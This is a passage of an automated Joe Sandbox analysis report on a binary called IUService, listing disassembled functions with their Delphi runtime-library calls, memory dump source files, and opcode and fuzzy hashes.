                                                                                                                                              • Part of subcall function 500089A4: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(50006B15,00000000,50006B69), ref: 500089B7
                                                                                                                                            • @System@@UStrLen$qqrx20System@UnicodeString.RTL120(00000000,50024767), ref: 50024746
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Unicode$StringSystem@System@@$AnsiEnsureFromInternalLen$qqrx20Str$qqrr20String$qqrr20Stringx27System@%T$us$i0$%
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2906622797-0
                                                                                                                                            • Opcode ID: 9cab3a8bcc449554f3d38e26dfc2d9bd4fcf12d5c115a2b1dcda5b5b04b7de7d
                                                                                                                                            • Instruction ID: a635cd3dcb40994497b53f8fe6e6c41f0fe1daa708a8bd6d2e43c945e9681864
                                                                                                                                            • Opcode Fuzzy Hash: 9cab3a8bcc449554f3d38e26dfc2d9bd4fcf12d5c115a2b1dcda5b5b04b7de7d
                                                                                                                                            • Instruction Fuzzy Hash: AF01B13551F1D6AED7A1AFA0F8525EEB7E8EB13300BA106B6ED2082901D3649E00A251
                                                                                                                                            Function 5000D750 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@DynArrayLength$qqrv.RTL120 ref: 5000D75A
                                                                                                                                            • @System@@WStrSetLength$qqrr17System@WideStringi.RTL120 ref: 5000D766
                                                                                                                                              • Part of subcall function 50009C30: @System@@NewWideString$qqri.RTL120(?,?,?,?,5000965D,?,?,?), ref: 50009C40
                                                                                                                                              • Part of subcall function 50009C30: @System@Move$qqrpxvpvi.RTL120(?,?,?,?,5000965D,?,?,?), ref: 50009C6E
                                                                                                                                            • @System@@DynArrayLength$qqrv.RTL120 ref: 5000D7C6
                                                                                                                                            • @System@@WStrSetLength$qqrr17System@WideStringi.RTL120 ref: 5000D7D4
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@@$System@Wide$ArrayLength$qqrr17Length$qqrvStringi$Move$qqrpxvpviString$qqri
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2943924986-0
                                                                                                                                            • Opcode ID: 085050b287510eb7b9789a4d6570b4c0541888048f5ea3701a0f565ec4d1815e
                                                                                                                                            • Instruction ID: 5542b4fa33d5804e65baac3af09d9e428f9e0197dd64d1a1656dc7895a855856
                                                                                                                                            • Opcode Fuzzy Hash: 085050b287510eb7b9789a4d6570b4c0541888048f5ea3701a0f565ec4d1815e
                                                                                                                                            • Instruction Fuzzy Hash: 4E01F9202149495FD3109F6DD8419ABB3E2EFE0311B40C23BF545C7229EAB49942C290
                                                                                                                                            Function 500098F4 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@NewWideString$qqri.RTL120 ref: 5000992F
                                                                                                                                            • @System@Move$qqrpxvpvi.RTL120 ref: 5000993E
                                                                                                                                            • @System@Move$qqrpxvpvi.RTL120 ref: 5000994E
                                                                                                                                            • @System@@WStrClr$qqrpv.RTL120 ref: 50009962
                                                                                                                                              • Part of subcall function 50009588: SysFreeString.OLEAUT32(?), ref: 50009596
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Move$qqrpxvpviSystem@System@@$Clr$qqrpvFreeStringString$qqriWide
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2700047326-0
                                                                                                                                            • Opcode ID: 2a90c5cc7be5839c9d2fdc1aa24c1342b383aaa77810758ece04b21b21fc663a
                                                                                                                                            • Instruction ID: 98f1936eb00471f73aa790e79a7215fb5c6e676163bb9629522c800d1bc1a43f
                                                                                                                                            • Opcode Fuzzy Hash: 2a90c5cc7be5839c9d2fdc1aa24c1342b383aaa77810758ece04b21b21fc663a
                                                                                                                                            • Instruction Fuzzy Hash: 1501F7313096454BAB14DA6DECA09AEB3D8DF90610B80033DFA84C7351EE20ED05C384
                                                                                                                                            Function 5001C2C8 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@LStrAddRef$qqrpv.RTL120 ref: 5001C2D3
                                                                                                                                            • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(00000000,5001C348), ref: 5001C300
                                                                                                                                              • Part of subcall function 500089C4: @System@@LStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120 ref: 500089C9
                                                                                                                                            • @Sysutils@ByteType$qqrx27System@%AnsiStringT$us$i0$%i.RTL120(00000000,5001C348), ref: 5001C31C
                                                                                                                                            • @System@@LStrClr$qqrpv.RTL120(5001C34F), ref: 5001C342
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@@$AnsiStringSystem@%$FromStr$qqrr27StringusSystem@T$us$i0$%x20Unicode$ByteClr$qqrpvInternalRef$qqrpvSysutils@T$us$i0$%iType$qqrx27
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3795063905-0
                                                                                                                                            • Opcode ID: 0090cee197739f04d46da03a3fbf7122e71953c6443ae2ffadc7c537a123e11b
                                                                                                                                            • Instruction ID: edce9a773ba6554bf0e1fbf5d896e20fbc1511fab1bfff3c5ce3298a0291d8fe
                                                                                                                                            • Opcode Fuzzy Hash: 0090cee197739f04d46da03a3fbf7122e71953c6443ae2ffadc7c537a123e11b
                                                                                                                                            • Instruction Fuzzy Hash: 47014C30704289EF9B11DEA9DE92C6EB3F8FB482107A18275E504D3251EB70EF80D655
                                                                                                                                            Function 5000A534 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@UniqueString$qqrr20System@UnicodeString.RTL120 ref: 5000A53F
                                                                                                                                              • Part of subcall function 5000AAF8: @System@@NewUnicodeString$qqri.RTL120(?,5000A544), ref: 5000AAC6
                                                                                                                                              • Part of subcall function 5000AAF8: @System@Move$qqrpxvpvi.RTL120(00000000,?,5000A544), ref: 5000AAD7
                                                                                                                                              • Part of subcall function 5000AAF8: @System@@FreeMem$qqrpv.RTL120(?,5000A544), ref: 5000AAEC
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120 ref: 5000A559
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@Move$qqrpxvpvi.RTL120 ref: 5000A593
                                                                                                                                            • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120 ref: 5000A59D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$System@@Unicode$String$AnsiFromMove$qqrpxvpviStr$qqrr20Stringx27System@%T$us$i0$%$FreeInternalLength$qqrr20Mem$qqrpvString$qqriString$qqrr20StringiUnique
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2646382837-0
                                                                                                                                            • Opcode ID: c65559b3a43a539bc9f39b9396eb3fc635474360def7c2b98761288a201bb686
                                                                                                                                            • Instruction ID: 572ec78243513e6f1005ed345ec0839db98a53653f4091473b1bd5e8e29c749c
                                                                                                                                            • Opcode Fuzzy Hash: c65559b3a43a539bc9f39b9396eb3fc635474360def7c2b98761288a201bb686
                                                                                                                                            • Instruction Fuzzy Hash: E001DF317029624BAB109A3DDDA1559B3A6BFD6215394433AA506CB21EDA71CC0582C1
                                                                                                                                            Function 500141D4 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@Random$qqrv.RTL120 ref: 500141DA
                                                                                                                                            • @System@Random$qqrv.RTL120 ref: 500141EF
                                                                                                                                            • @System@Ln$qqrxg.RTL120(?,?,?), ref: 5001422E
                                                                                                                                            • @System@Sqrt$qqrxg.RTL120 ref: 50014245
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$Random$qqrv$Ln$qqrxgSqrt$qqrxg
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 817724637-0
                                                                                                                                            • Opcode ID: a6d630325e0aea591bba7b45fbec38567b7a778495fcfedd49ce34c84d5982ca
                                                                                                                                            • Instruction ID: fbb615ccd8c33ff108ba09c26bee9e4f63df910d59be1be1ea666f5daae47871
                                                                                                                                            • Opcode Fuzzy Hash: a6d630325e0aea591bba7b45fbec38567b7a778495fcfedd49ce34c84d5982ca
                                                                                                                                            • Instruction Fuzzy Hash: 9D11A3A1E0E0A962DB5227B1FC254CD7F74EE52901B968B4BE8E160172E92344B0CB91
                                                                                                                                            Function 50012310 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@LoadResString$qqrp20System@TResStringRec.RTL120(5850026B,5850026B,5850026B,A850017A), ref: 500122D7
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrx20System@UnicodeString.RTL120(5850026B,5850026B,5850026B,A850017A), ref: 500122E6
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(5850026B,5850026B,5850026B,A850017A), ref: 500122EB
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$String$Except$qqrvException@$bctr$qqrx20LoadRaiseString$qqrp20System@@Sysutils@Unicode
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 486460785-0
                                                                                                                                            • Opcode ID: 7528642fe36d409ab37d41aa7cd802e04feb64ed356f621298a75c45d9c0b7a2
                                                                                                                                            • Instruction ID: 93523e8249dd9ce77bc6417ffb8b9f6d823e4069e3a6fe8b24fa869761cfaa76
                                                                                                                                            • Opcode Fuzzy Hash: 7528642fe36d409ab37d41aa7cd802e04feb64ed356f621298a75c45d9c0b7a2
                                                                                                                                            • Instruction Fuzzy Hash: 73014531108188AFE7219B54FD5285DBBE8EF11B00FA14A67F880C3121EA36AE20C691
                                                                                                                                            Function 500319C8 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @Variants@@VarCast$qqrr8TVarDatarx8TVarDatai.RTL120(?,?,?,50031AAD,?,?,?,?,?,50031D04,?,?,50031826,?,?), ref: 500319EA
                                                                                                                                            • @Variants@VarResultCheck$qqrlusus.RTL120(?,?,00000400,00000000,?,?,?,?,50031AAD,?,?,?,?,?,50031D04), ref: 50031A07
                                                                                                                                            • @Variants@VarResultCheck$qqrlusus.RTL120(?,?,00000400,00000000,?,?,?,?,50031AAD,?,?,?,?,?,50031D04), ref: 50031A33
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Check$qqrlususResultVariants@$Cast$qqrr8DataiDatarx8Variants@@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3943155465-0
                                                                                                                                            • Opcode ID: 77355a2d1c28337b9aea844143a0d13c94828378edea623601bc6950340cad5c
                                                                                                                                            • Instruction ID: 02da0ea19857f0b83c7a60a854380d64f6c7b6957c68f820763625778b4e7104
                                                                                                                                            • Opcode Fuzzy Hash: 77355a2d1c28337b9aea844143a0d13c94828378edea623601bc6950340cad5c
                                                                                                                                            • Instruction Fuzzy Hash: E8F0F9203028602FC631935E9C41BDB63DAEFE9A13F108117F300DB3A5CE745C46C2A6
                                                                                                                                            Function 5002D5A8 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002D61B), ref: 5002D5E1
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,5002D61B), ref: 5002D5F4
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: StringSystem@System@@Unicode$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Char$qqrx20Internal
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4285912285-0
                                                                                                                                            • Opcode ID: b9cb69941f6bd798a715a23d18ccd4e8101779eda8d34779b1012db782d0a2da
                                                                                                                                            • Instruction ID: 2bb75f54c739022caca7f9861818caf256e2ce358085963fa9b364de837498d7
                                                                                                                                            • Opcode Fuzzy Hash: b9cb69941f6bd798a715a23d18ccd4e8101779eda8d34779b1012db782d0a2da
                                                                                                                                            • Instruction Fuzzy Hash: 0C01A230701A96EFAF01DFA8E9A1859B3F8EF4920079046B2E604D3311EB70EE01D650
                                                                                                                                            Function 500142A0 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 3491d13ce977adb284dd967d48cb490c5e952e317b4e9566dc2991631f39bb96
                                                                                                                                            • Instruction ID: c1de16781ca36d56b2275917d1e3df3af7e72a7d42cbb7651fe9816313171543
                                                                                                                                            • Opcode Fuzzy Hash: 3491d13ce977adb284dd967d48cb490c5e952e317b4e9566dc2991631f39bb96
                                                                                                                                            • Instruction Fuzzy Hash: 5701F2721005859FE7A0CFA8EC92949F3B5FB95311BC983A6FA1487662D731AA84C550
                                                                                                                                            Function 5001980C Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@WStrFromUStr$qqrr17System@WideStringx20System@UnicodeString.RTL120(?,00000000,50019880), ref: 50019831
                                                                                                                                            • @System@@WStrToPWChar$qqrx17System@WideString.RTL120(?,00000000,50019880), ref: 50019839
                                                                                                                                            • CLSIDFromString.OLE32(00000000,?,00000000,50019880), ref: 5001983F
                                                                                                                                            • @System@@WStrClr$qqrpv.RTL120(50019887,50019880), ref: 5001987A
                                                                                                                                              • Part of subcall function 500197B8: @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,?,00000000,?,5001E08F), ref: 500197CC
                                                                                                                                              • Part of subcall function 500197B8: @System@@RaiseExcept$qqrv.RTL120(00000000,?,?,00000000,?,5001E08F), ref: 500197D1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$StringSystem@@$FromWide$Char$qqrx17Clr$qqrpvExcept$qqrvException@$bctr$qqrp20RaiseRecpx14RecxiStr$qqrr17Stringx20Sysutils@Unicode
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1168828238-0
                                                                                                                                            • Opcode ID: 9ab87b7335fb4515f68039e7d798c1498550c4d3bc14ec7b5041b138188d54e0
                                                                                                                                            • Instruction ID: 4276e7b8eb8c2fd0cf21d2c372ffec7e5207b388c706a152fa8cb5ce2d8a9212
                                                                                                                                            • Opcode Fuzzy Hash: 9ab87b7335fb4515f68039e7d798c1498550c4d3bc14ec7b5041b138188d54e0
